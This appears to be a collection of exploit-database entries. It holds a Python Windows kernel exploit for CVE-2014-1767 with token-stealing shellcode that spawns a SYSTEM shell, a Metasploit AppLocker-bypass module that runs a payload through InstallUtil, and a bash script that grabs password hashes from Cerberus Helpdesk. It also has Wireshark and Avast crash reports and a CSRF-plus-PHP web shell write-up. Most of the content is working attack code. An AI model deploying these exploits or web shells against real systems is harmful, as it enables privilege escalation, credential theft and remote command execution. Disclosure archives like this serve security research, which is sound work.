    mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff) 

   
    # Fixed layout: 0x20 bytes of filler, then the address and MDL size as
    # little-endian QWORDs, then two marker DWORDs and two flag DWORDs,
    # zero-padded to inbuf1size.
    inbuf1  = "\x41" * 0x20
    inbuf1 += struct.pack("Q", virtualAddress)    #0x1a
    inbuf1 += struct.pack("Q", mdlsize)
    inbuf1 += "\x42" * 4
    inbuf1 += "\x43" * 4
    inbuf1 += "\x01\x00\x00\x00"
    inbuf1 += "\x00\x00\x00\x00"
    inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
       
    # Requested base for the backing page; the actual base chosen by the
    # kernel is written back into baseadd but not used.
    baseadd    = c_ulonglong(0x1001)
    
    dwStatus = ntdll.NtAllocateVirtualMemory(-1,
                                        byref(baseadd),
                                        0x0,
                                        byref(RegionSize),
                                        MEMRES,
                                        PAGEEXE)

    wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
    
def CreateBuffer2(inbuf2addr):
    """Write the 0x18-byte input buffer for IOCTL 0x120C3 (AfdTransmitPackets) at inbuf2addr.

    Layout: a count of 1 followed by a pointer (addrforbuf2), zero-padded.
    The backing page is mapped first; as in CreateBuffer1 the status of
    NtAllocateVirtualMemory (dwStatus) and of WriteProcessMemory is ignored.
    """
    print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
    inbuf2size = 0x18
    addrforbuf2 = 0x0AAAAAAA
   
    inbuf2 = struct.pack("Q", 0x1)
    inbuf2 += struct.pack("Q", addrforbuf2)
    inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
       
    # Requested base is one past inbuf2addr; the kernel-chosen base is not checked.
    baseadd    = c_ulonglong(inbuf2addr+1)
    dwStatus = ntdll.NtAllocateVirtualMemory(-1,
                                        byref(baseadd),
                                        0x0,
                                        byref(RegionSize),
                                        MEMRES,
                                        PAGEEXE) 
    kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))

def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
    """Lay out the fake worker-factory object that replaces the freed kernel object.

    firstWrite:           kernel address the first partial write targets.
    fakeobjectaddr:       user-mode address where the FakeObjSize-byte object is written.
    setinfoworkerfactory: user-mode address whose preceding 0x18 bytes hold a
                          secondary object; its QWORD at +0x18 is firstWrite, and
                          main() later rewrites that QWORD before each further write.
    Writes both objects with WriteProcessMemory; return values are not checked.
    """
    print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
    
    fakeobject2addr = setinfoworkerfactory - 0x18

    fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
    fakeobj2size = len(fakeobject2)
    kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))

    # Fixed object-header bytes (pointer count, handle count, type index etc.)
    # that make the fake object pass the kernel's checks; taken as-is from the
    # referenced analysis.
    objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

    fakeobject = objhead
    fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
    fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
    kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))   

def main():
    """Drive the two-phase CVE-2014-1767 (MS14-040) use-after-free on Windows 7 x64.

    Phase 1 (IOCTL 0x1207F) sets up the dangling pointer and reclaims the
    freed allocation with a worker-factory object; phase 2 (IOCTL 0x120C3)
    frees it again and the fake object from CreateFakeObject takes its place,
    giving three partial kernel writes that redirect HalDispatchTable+0x8 to
    the user-mode shellcode. NtQueryIntervalProfile then calls through that
    pointer and a SYSTEM shell is spawned. The offsets are for the exact
    afd.sys/ntdll builds listed in the header; installing MS14-040 removes the
    bug. Most native return values are not checked.
    """
    print "[+] creating socket..."
    # Raw Winsock handle: it doubles as the file handle for ZwDeviceIoControlFile.
    sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)

    if sock == -1:
        print "[-] no luck creating socket!"
        sys.exit(1)

    print "[+] got sock 0x%x" % sock

    # Connect to loopback:135 (presumably chosen because the RPC endpoint
    # mapper is normally listening); connect()'s result is not checked.
    addr = sockaddr_in()
    addr.sin_family = socket.AF_INET
    addr.sin_port = socket.htons(135)
    addr.sin_addr = socket.htonl(0x7f000001)

    connect(sock, byref(addr), sizeof(addr))

    print "[+] sock connected."
    print "[+] fill kernel heap"

    # Allocate GDI regions until CreateRoundRectRgn fails; per the status
    # message above this is meant to exhaust kernel heap so the later
    # allocations land predictably. Handles are kept in rgnarr and never freed.
    rgnarr = []
    nBottomRect = 0x02aaaaaa
    while(1):
        hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)

        if hrgn == 0:
            break
        rgnarr.append(hrgn)
        print ".",


    print "\n[+] GO!"
    # Shadows the module-level HalDispatchTable placeholder.
    HalDispatchTable = get_haldispatchtable()
    print "[+] HalDispatchTable address:", hex(HalDispatchTable)
    # Win7 - x64 
    (halbase, dllname) = find_driver_base("hal.dll")
    # OS is hard-coded; the structure offsets below are only defined for "7",
    # so any other value would raise NameError further down.
    OS = "7"
    if OS == "7":
        HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
        _KPROCESS = "\x70"
        _TOKEN    = "\x08\x02"
        _UPID     = "\x80\x01"
        _APLINKS  = "\x88\x01"   

    print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)

    IoStatus = c_ulonglong()
    IoStatusBlock = c_ulonglong()

    # Targets of the three partial writes, all relative to HalDispatchTable+0x8.
    addrSetInfoWorkerFactory = 0x2218
    firstWriteAddr  = HalDispatchTable + 0x8 - 0x2C
    secondWriteAddr = firstWriteAddr + 0x4
    thirdWriteAddr = firstWriteAddr + 0x1

    # The c_ulonglong binding is immediately replaced by a plain int (dead assignment).
    shellcode_address   = c_ulonglong
    shellcode_address   = 0x0000000000002500
    what_address        = 0x0000250800002500
    what_part1          = what_address & 0xfffffff
    what_part2          = what_address >> 32 & 0xfffffff

    # Fixed low user-mode addresses for the IOCTL buffers and the fake object.
    inbuf1 = 0x1000
    inbuf2 = 0x2000
    hWF = c_ulonglong(0)
    FakeWorkerFactoryADDR = 0x2100

    CreateBuffer1(inbuf1)
    CreateBuffer2(inbuf2)
    CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
    print ""
    print ""
    print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
    print "[*] structures for phase 2 and fil the freed space with a "
    print "[*] WorkerFactory Object"
    raw_input("[+] Press Enter to trigger phase 1")
    ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong), 
                                            c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
    # Phase 1; status is stored but never examined.
    status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)


    # The worker factory needs a completion port; together they reclaim the
    # freed allocation from phase 1.
    kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
    CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))

    ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
    ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
    hWFaddr = hWF   # unused alias


    # Shellcode assembly. The pieces are kept as named fragments:
    #   sc_pointer    - 16-byte header pointing at the code that follows it
    #   restore_ptrs  - saves registers and puts HaliQuerySystemInformation
    #                   back into HalDispatchTable+0x8 (both packed in below)
    #   tokenstealing - uses the _KPROCESS/_TOKEN/_UPID/_APLINKS offsets set above
    #   fixobjheaders - repairs the object headers using hWF.value, restores
    #                   registers and returns
    padding           = "\x90"*8
    HalDispatchTable0x8 = HalDispatchTable + 0x8

    sc_pointer = struct.pack("Q", shellcode_address+0x10)
    sc_pointer += struct.pack("Q", 0x25)   

    restore_ptrs =  "\x41\x51"                                                  +\
                    "\x41\x52"                                                  +\
                    "\x41\x53"                	                                +\
                    "\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation)   +\
                    "\x49\xba" + struct.pack("Q", HalDispatchTable0x8)          +\
                    "\x4d\x89\x0a"
                    
    tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00"      +\
                    "\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
                    "\x4D\x89\xCA"                              +\
                    "\x4D\x8B\x89" + _APLINKS + "\x00\x00"      +\
                    "\x49\x81\xE9" + _APLINKS + "\x00\x00"      +\
                    "\x49\x83\xB9" + _UPID + "\x00\x00\x04"     +\
                    "\x75\xe8"                                  +\
                    "\x4D\x8B\x89" + _TOKEN + "\x00\x00"        +\
                    "\x4D\x89\x8A" + _TOKEN + "\x00\x00"       

    fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" 	        +\
                    "\x4d\x89\xd1"             	            +\
                    "\x4d\x8b\x12"             	            +\
                    "\x41\xbb" + struct.pack("L", hWF.value)+\
                    "\x41\x83\xe3\xfc"                      +\
                    "\x4d\x01\xdb"                          +\
                    "\x4d\x01\xdb"                          +\
                    "\x4d\x01\xda"             	            +\
                    "\x49\xc7\x02\x00\x00\x00\x00" 	        +\
                    "\x49\x83\xc1\x58"          	        +\
                    "\x4d\x89\xca"             	            +\
                    "\x4d\x8b\x09"             	            +\
                    "\x49\x83\xe9\x01"                      +\
                    "\x4d\x89\x0a"             	            +\
                    "\x41\x5b"                              +\
                    "\x41\x5A"                              +\
                    "\x41\x59"                              +\
                    "\xc3" 
                   
    shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
    shellcode_size    = len(shellcode)

    print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)

    # The page at shellcode_address is never explicitly allocated here; it is
    # assumed to be mapped (the write's return value is not checked).
    kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))

    print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
    print "[*] WorkerFactory object created above and fill the freed object"
    print "[*] with a user controlled object to perform the necessary overwrites"
    raw_input("[+] Press Enter to trigger phase 2")

    ### Trigger 2
    ## afd!AfdTransmitPackets
    ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)

    # Three partial writes through the fake object: the target QWORD at
    # addrSetInfoWorkerFactory is rewritten between calls so each
    # ZwSetInformationWorkerFactory lands on a different address.
    ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
    ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4) 
    kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
    ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) 
    kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
    ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;   # stray ';' is harmless in Python

    # NtQueryIntervalProfile calls through HalDispatchTable+0x8, which the
    # writes above now point at the shellcode. The c_long() values are
    # overwritten/unused (inp is rebound to an int, qip is never read).
    inp  = c_long()
    out  = c_long()
    inp  = 0x1337
    qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
    print "[*] Spawning a SYSTEM shell..."
    os.system("cmd.exe /K cd c:\\windows\\system32")


# Entry point: the ctypes signatures and offsets above are 64-bit only.
if __name__ == "__main__":
    if platform.architecture()[0] == '64bit':
        main()
    else:
        print "Please use a 64 bit version of python"
        sys.exit()
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'AppLocker Execution Prevention Bypass',
      'Description'   => %q{
        This module will generate a .NET service executable on the target and utilise
        InstallUtil to run the payload bypassing the AppLocker protection.

        Currently only the InstallUtil method is provided, but future methods can be
        added easily.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Casey Smith', # Original AppLocker bypass research
        'OJ Reeves'    # MSF module
      ],
      'Platform'      => [ 'win' ],
      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> 'Aug 3 2015',
      'References'    => [
        ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
      ]
    ))

    # TECHNIQUE is an enum so further methods can be added next to INSTALLUTIL
    # without changing the option's interface.
    register_options([
      OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])
    ])
  end

  # Framework entry point for the "run"/"exploit" command.
  #
  # Refuses a 64-bit payload when the session does not report a 64-bit
  # architecture, then dispatches on the selected TECHNIQUE.
  def exploit
    technique = datastore['TECHNIQUE']

    if technique == 'INSTALLUTIL' && payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
      fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
    end

    # sysinfo is only available on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?

    execute_installutil if technique == 'INSTALLUTIL'
  end

  # INSTALLUTIL technique: drop a C# installer source into %TEMP%, compile it
  # with csc.exe from the located .NET directory, and launch the result through
  # InstallUtil.exe /U in a hidden window.  Both dropped files are registered
  # for cleanup.
  def execute_installutil
    envs = get_envs('TEMP', 'windir')
    temp_dir = envs['TEMP']

    dotnet_path = get_dotnet_path(envs['windir'])
    print_status("Using .NET path #{dotnet_path}")

    cs_path          = "#{temp_dir}\\#{Rex::Text.rand_text_alpha(8)}.cs"
    exe_path         = "#{temp_dir}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    csc_path         = "#{dotnet_path}\\csc.exe"
    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

    print_status("Writing payload to #{cs_path}")
    write_file(cs_path, generate_csharp_source)
    register_files_for_cleanup(cs_path)

    print_status("Compiling payload to #{exe_path}")
    csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
    csc_args = "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}"
    vprint_status("Executing: #{csc_path} #{csc_args}")
    cmd_exec(csc_path, csc_args)

    print_status("Executing payload ...")
    installutil_args = "/logfile= /LogToConsole=false /U #{exe_path}"
    vprint_status("Executing: #{installutil_path} #{installutil_args}")
    client.sys.process.execute(installutil_path, installutil_args, {'Hidden' => true})
    register_files_for_cleanup(exe_path)
  end

  # Locates a .NET Framework directory (Framework or Framework64, matching the
  # payload architecture) under +windir+ that contains InstallUtil.exe.
  #
  # Fails the module with NotVulnerable when no such directory exists.
  def get_dotnet_path(windir)
    suffix = payload.arch.first == 'x86' ? '' : '64'
    base_path = "#{windir}\\Microsoft.NET\\Framework#{suffix}"

    version_dirs = dir(base_path).select { |entry| entry[0] == 'v' }

    # The listing is walked in reverse; presumably the highest vN.N directory
    # sorts last, so the newest runtime shipping InstallUtil.exe wins -- confirm.
    chosen = version_dirs.reverse.find do |entry|
      full_path = "#{base_path}\\#{entry}"
      directory?(full_path) && file?("#{full_path}\\InstallUtil.exe")
    end

    fail_with(Failure::NotVulnerable, '.NET is not present on the target.') if chosen.nil?

    "#{base_path}\\#{chosen}"
  end

  # Builds the C# source of the installer.  The encoded payload is embedded as
  # a byte array and executed from a RWX allocation inside Installer.Uninstall,
  # which is the method InstallUtil /U invokes.
  def generate_csharp_source
    byte_list = payload.encoded.bytes.map { |b| "0x#{b.to_s(16)}" }.join(',')
    %Q^
using System;

namespace Pop
{
  public class Program { public static void Main() { } }

  [System.ComponentModel.RunInstaller(true)]
  public class Pop : System.Configuration.Install.Installer
  {
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
    private static UInt32 INFINITE = 0xFFFFFFFF;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

    public override void Uninstall(System.Collections.IDictionary s)
    {
      byte[] sc = new byte[] {#{byte_list}};
      IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
      IntPtr id = IntPtr.Zero;
      WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
    }
  }
}
    ^
  end

end
            
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing                   #
# Date: 04.02.2016                                                                  #
# Exploit Author: asdizzle_                                                         #
# Vendor Homepage: http://www.cerberusweb.com/                                      #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7                                                                  #
# Tested on: Debian 8 / apache2 with cerb 5                                         #
#####################################################################################
# Prerequisites:                                                                    #
#		-At least one worker must be logged in                              #
#		-/storage/tmp/ dir must be accessible                               #
#                                                                                   #
# If everything else fails try if there's directory listing in /storage/tmp         #
# You might find attachments and even support tickets.                              #
#####################################################################################

url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'

# Serialized worker cache the application leaves under /storage/tmp
cache_url="$url/storage/tmp/${pre}_cache---ch_workers"

echo "[*] Trying to fetch cache file"

cachechk=$(curl -s "$cache_url" | grep pass)
if [ -z "$cachechk" ]; then
	echo "[-] File not found."
	exit
fi

echo "[+] Found. Extracting..."
# Split the serialized blob at each "s:5" marker, keep the records carrying an
# email, and join the 4th and 8th quoted fields with ':' (presumably email:hash).
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ]; then
	echo "[-] Hash extracting failed"
	exit
fi

echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=739

The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):

--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
    #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
    #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
    #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
    #3 0x51e4bc in main wireshark/tshark.c:2213:13

0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
    #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
    #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
    #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
    #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
    #4 0x51e4bc in main wireshark/tshark.c:2213:13

previously allocated by thread T0 here:
    #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
    #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
    #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
    #5 0x51e4bc in main wireshark/tshark.c:2213:13

SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
  0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
  0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
  0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
  0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6853==ABORTING
--- cut ---

The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=668

The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.


(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06            mov     eax,dword ptr [esi]  ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55              push    ebp
740b4446 56              push    esi
740b4447 57              push    edi
740b4448 33ff            xor     edi,edi
740b444a 8be9            mov     ebp,ecx
740b444c 85db            test    ebx,ebx
740b444e 7447            je      aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418        mov     esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0  30303030

# It looks like this address was a parameter; let's go up a frame and see where it comes from
0:080> kvn 3
 # ChildEBP RetAddr  Args to Child..............
 WARNING: Stack unwind information not available. Following frames may be wrong.
 00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
 01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
 02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
 0:080> .frame /c 1
 01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
 eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
 eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0         nv up ei pl nz na pe nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
 aswCmnBS_74080000!StreamHashClose+0x81be:
 740b483e 8bf8            mov     edi,eax
 0:080> ub.
 aswCmnBS_74080000!StreamHashClose+0x81aa:
 740b482a 0000            add     byte ptr [eax],al
 740b482c 0001            add     byte ptr [ecx],al
 740b482e 0000            add     byte ptr [eax],al
 740b4830 00ff            add     bh,bh
 740b4832 7044            jo      aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
 740b4834 8bce            mov     ecx,esi
 740b4836 ff7040          push    dword ptr [eax+40h]
 740b4839 e802fcffff      call    aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)

# The parameter comes from eax+40:
 0:080> dd eax+40 L1
 128be3a4  30303030

# What is that address?

 0:080> !address @eax
 Mapping file section regions...
 Mapping module regions...
 Mapping PEB regions...
 Mapping TEB and stack regions...
 Mapping heap regions...
 Mapping page heap regions...
 Mapping other regions...
 Mapping stack trace database regions...
 Mapping activation context regions...


 Usage:                  Heap
 Base Address:           128b8000
 End Address:            128ea000
 Region Size:            00032000
 State:                  00001000   MEM_COMMIT
 Protect:                00000004   PAGE_READWRITE
 Type:                   00020000   MEM_PRIVATE
 Allocation Base:        12150000
 Allocation Protect:     00000004   PAGE_READWRITE
 More info:              heap owning the address: !heap 0x120000
 More info:              heap segment
 More info:              heap entry containing the address: !heap -x 0x128be364


# It's a heap buffer, is it valid?

 0:080> !heap -x 0x128be364
 Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
 -----------------------------------------------------------------------------
 128bd038  128bd040  00120000  122ef5e0      1408      -           3f  LFH;busy.


# Looks okay to me, where does that buffer come from?

0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c          add     esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000            add     byte ptr [eax],al
740c37d5 0000            add     byte ptr [eax],al
740c37d7 8b464c          mov     eax,dword ptr [esi+4Ch]
740c37da 57              push    edi
740c37db 0345e8          add     eax,dword ptr [ebp-18h]
740c37de 50              push    eax
740c37df ff7510          push    dword ptr [ebp+10h]
740c37e2 e88bc70000      call    aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c  57d9ddea

That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:

│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~?  1??|...

This looks like broken authenticode parsing to me.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
            
<!--
Exploit title:  Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF

Note: The developer applied the patch to the webapp without changing the revision number, which could cause confusion for customers.
---------------------
There is no token check when changing a user's rank, which allows CSRF. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.

PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.

Timeline:
